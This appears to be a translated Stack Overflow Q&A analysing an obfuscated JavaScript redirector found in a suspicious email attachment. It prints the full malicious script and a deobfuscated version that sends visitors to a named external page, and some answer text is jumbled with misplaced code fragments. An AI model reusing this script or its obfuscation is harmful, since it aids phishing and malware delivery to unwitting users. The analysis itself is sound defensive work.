我的一些非IT同事在电子邮件中打开了一个非常可疑的.html附件。当看起来运行了一些javascript代码时,它导致了一个空白屏幕。
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
它做了什么?这超出了我的编程知识范围。
答案 0 :(得分:19)
它会重定向到网址“http://lendermedia.com/images/z.htm”(请自行承担风险)。
将代码复制并粘贴到有价值的JavaScript编辑器中,然后让它为您设置格式。
关键点:
var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
h
将等于'http://lendermedia.com/images/z.htm'
t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
t
将包含对document.location
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
此href
b
的属性,此时(在另一个函数内)确实是上述语句中的t
,设置为h
,这是function uK() {
};
uK.prototype = {
f : function() {
var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
.replace(/[\^H\!9X]/g, '');
t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
function x(b) {
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
}
x(t);
}
};
var tL = new uK();
tL.f();
网址。
大多数代码仅仅是噪音,实际功能包括:
{{1}}
答案 1 :(得分:2)
我遇到了同样的问题,然后找到了这个页面。在完成联系信息的WHOIS之后,我联系了lendermedia.com的所有者,他似乎刚刚发现他的网站正在托管z.htm
页面,而不是他的知识和他的意愿。当我联系他时,我能够浏览他的/images/
目录。他已经改变了权限。所有这一切都说这个家伙看起来很干净,但那是你决定的。
答案 2 :(得分:0)
减去混淆,它的作用类似于document.location.href="http://lendermedia.com/images/z.htm"
答案 3 :(得分:0)
理解的关键部分该代码是replace(/[\^H\!9X]/g, '')
部分。如果替换的第二个参数是''
,那么它只是从前一个字符串中删除东西。
混淆事物的方式非常不优雅。可能的目的只是为每个用户随机,避免贝叶斯垃圾邮件过滤器。